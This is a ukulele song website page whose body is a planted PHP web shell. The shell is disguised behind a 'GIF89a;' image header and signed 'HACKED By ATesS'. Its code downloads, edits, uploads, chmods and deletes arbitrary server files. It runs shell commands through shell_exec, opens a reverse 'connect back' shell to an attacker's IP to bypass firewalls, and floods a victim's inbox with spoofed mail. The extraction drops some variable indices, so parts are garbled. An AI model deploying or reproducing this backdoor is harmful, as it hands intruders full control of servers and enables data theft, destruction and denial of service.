Start
Swedish Songs
English Songs
French Songs
Song Lists
Unfinished Songs
Upload
Transpose:
-6
-5
-4
-3
-2
-1
0
1
2
3
4
5
6
Ukulele tuning:
C
D
G
Display format:
Double Rows
Single Rows
Inline Icons
Separate Icons
Text Only
GIF89a;
//download Files Code
'fdownload'
$fdownload=$_GET;
if ($fdownload <> "" ){
// path & file name
$path_parts = pathinfo("$fdownload");
"basename"
$entrypath=$path_parts;
$name = "$fdownload";
$fp = fopen($name, 'rb');
header("Content-Disposition: attachment; filename=$entrypath");
header("Content-Length: " . filesize($name));
fpassthru($fp);
exit;
}
?>
HACKED By ATesS WHAS HERE?
error_reporting(E_ERROR | E_WARNING | E_PARSE);
//File Edit
'fedit'
$fedit=$_GET;
if ($fedit <> "" ){
$fedit=realpath($fedit);
$lines = file($fedit);
echo "
";
echo "
" ;
foreach ($lines as $line_num => $line) {
echo htmlspecialchars($line);
}
echo "
";
'savefile'
$savefile=$_POST;
'filepath'
$filepath=realpath($_POST);
if ($savefile <> "")
{
$fp=fopen("$filepath","w+");
fwrite ($fp,"") ;
fwrite ($fp,$savefile) ;
fclose($fp);
echo "";
}
exit();
}
?>
// CHmod - PRimission
'fchmod'
$fchmod=$_GET;
if ($fchmod <> "" ){
$fchmod=realpath($fchmod);
echo "
chmod for :$fchmod
Chmod :
";
'chmod0'
$chmod0=$_POST;
if ($chmod0 <> ""){
chmod ($fchmod , $chmod0);
}else {
echo "primission Not Allow change Chmod";
}
exit();
}
?>
echo getcwd();
?>
">
File Manager
CMD
Shell
Fake mail
Connect Back
About
//*******************************************************
//Start Programs About US
'id'
$id=$_GET;
if ($id=="") {
echo "
TüRKiS Hackers : WWW.MiLLiHaReKeT.COM
Programer : HaCKeD By ATesS
Note : ATesS||Attacker MiLLiHaReKeT security Group
please : If you find bug or problems in program , tell me by :
e-mail : ates@el-hacker.org
MHT ATesS
Enjoy :)
";
echo "
OS :". php_uname();
echo "
IP :".
'REMOTE_ADDR'
($_SERVER);
echo "";
}
//************************************************************
//cmd-command line
'cmd'
$cmd=$_POST;
if($id=="cmd"){
$result=shell_exec("$cmd");
echo "
CMD ExeCute
" ;
echo "
$result
";
}
//********************************************************
//fake mail = Use victim server 4 DOS - fake mail
if ( $id=="fake-mail"){
error_reporting(0);
echo "
Fake Mail- DOS E-mail By Victim Server
" ;
echo "
Victim Mail :
Number-Mail :
Comments:
";
//send Storm Mail
'to'
$to=$_POST;
'nom'
$nom=$_POST;
'Comments'
$Comments=$_POST;
if ($to <> "" ){
for ($i = 0; $i < $nom ; $i++){
$from = rand (71,1020000000)."@"."Attacker.com";
$subject= md5("$from");
mail($to,$subject,$Comments,"From:$from");
echo "$i is ok";
}
echo "";
}
}
//********************************************************
//Connect Back -Firewall Bypass
if ($id=="cshell"){
echo "
Connect back Shell , bypass Firewalls
For user :
nc -l -p 1019
Your IP & BindPort:
";
'mip'
$mip=$_POST;
'bport'
$bport=$_POST;
if ($mip <> "")
{
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
}
else {
fputs ($fp ,"n*********************************************nWelcome T0 SimAttacker 1.00 ready 2 USen*********************************************nn");
while(!feof($fp)){
fputs ($fp," bash # ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."n");
}
fclose ($fp);
}
}
}
//********************************************************
//Spy File Manager
$homedir=getcwd();
'dir'
$dir=realpath($_GET)."/";
if ($id=="fm"){
echo "
Home: $homedir
Path:
";
echo "
File / Folder Name
Size KByte
Download
Edit
Chmod
Delete
";
if (is_dir($dir)){
if ($dh=opendir($dir)){
while (($file = readdir($dh)) !== false) {
$fsize=round(filesize($dir . $file)/1024);
echo "
";
if (is_dir($dir.$file))
{
echo "
$file
dir
";
}
else {
echo "
$file ";
}
echo "
";
if (is_file($dir.$file))
{
echo "$fsize";
}
else {
echo " ";
}
echo "
";
if (is_file($dir.$file)){
if (is_readable($dir.$file)){
echo "
download";
}else {
echo "
No ReadAble
";
}
}else {
echo " ";
}
echo "
";
if (is_file($dir.$file))
{
if (is_readable($dir.$file)){
echo "
Edit";
}else {
echo "
No ReadAble
";
}
}else {
echo " ";
}
echo "
";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "
Dont in windows";
}
else {
echo "
Chmod";
}
echo "
Delete
";
}
closedir($dh);
}
}
echo "
Send this file:
";
}
//Upload Files
'dir'
$rpath=$_GET;
if ($rpath <> "") {
'userfile' 'name'
$uploadfile = $rpath."/" . $_FILES;
print "
";
'userfile' 'tmp_name'
if (move_uploaded_file($_FILES, $uploadfile)) {
echo "";
echo "";
}
}
//file deleted
'fdelete'
$frpath=$_GET;
if ($frpath <> "") {
if (is_dir($frpath)){
$matches = glob($frpath . '/*.*');
if ( is_array ( $matches ) ) {
foreach ( $matches as $filename) {
unlink ($filename);
rmdir("$frpath");
echo "";
echo "";
}
}
}
else{
echo "";
unlink ("$frpath");
echo "";
exit(0);
}
}
?>
Copyright 2004-MiLLiHaReKeT Security
DeSiNG By ATesS WHaS HeRe?
www.millihareket.com
Password: